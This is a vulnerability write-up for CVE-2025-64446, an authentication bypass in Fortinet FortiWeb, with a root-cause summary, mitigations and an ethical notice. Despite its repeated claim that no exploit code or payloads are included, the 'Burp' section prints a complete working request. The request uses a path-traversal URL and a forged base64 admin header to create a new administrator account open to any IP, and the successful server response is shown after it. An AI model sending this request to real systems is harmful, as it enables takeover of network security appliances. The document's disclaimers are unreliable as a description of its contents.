CVE-2025-64446-Proxy_Record_Exploit-8.0.0-Burp + Virtual Machine + Video

# CVE-2025-64446 – Fortinet FortiWeb Authentication Bypass (Research Overview) | Path Traversal Vulnerability 

## Overview
This document provides a **research‑grade analysis** of CVE‑2025‑64446, an authentication bypass vulnerability discovered in Fortinet FortiWeb appliances.  
It is intended *only* for academic, defensive security testing in controlled lab environments.

No exploit code is included in this document.

---

## Vulnerability Summary
CVE‑2025‑64446 enables an attacker to interact with administrative API endpoints **without valid authentication**, due to improper trust validation in a CGI parsing flow.

A malicious request can trigger the backend logic responsible for administrative actions, bypassing permission checks.

Impact includes:
- Unauthorized access to sensitive endpoints  
- Potential privilege escalation  
- Unauthorized configuration changes  
- Administrative user creation

---

## Root Cause (High‑Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Failure in validating serialized/encoded CGI metadata.

This combination enabled unauthorized execution of administrative actions.

---

## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin‑level operations.

Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json

{
  "status": "success",
  "code": 0,
  "message": "Operation completed"
}
```

---

## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical payloads**:

1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative success.
5. Capture response artifacts for documentation.

Researchers should generate their own payloads in private lab environments.


## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive

{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6": "::/0", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "comments": "", "sz_dashboard": -1, "type": "local-user", "type_val": "0", "admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val": "0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0, "history-password0": "", "history-password1": "", "history-password2": "", "history-password3": "", "history-password4": "", "history-password5": "", "history-password6": "", "history-password7": "", "history-password8": "", "history-password9": "", "force-password-change": "disable", "force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }
```
---

## Video and reproduce:

[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)

---

## Info:

[href](https://fortiguard.fortinet.com/psirt/FG-IR-25-910)


---

## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Disable exposed management interfaces from public networks.
- Enforce strict role‑based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.

---

## Ethical Notice
This documentation is for **defensive research only**.  
Please don't test systems you do not own or have explicit permission to assess.

---

## Credits
Researcher: **nu11secur1ty (2025)**  
Prepared for distribution to vulnerability analyzers and security researchers.

---

## Notes for PacketStorm Submission
- Include only sanitized Burp responses  
- Do NOT include exploit code or live payloads  
- Provide reproduction notes without operational details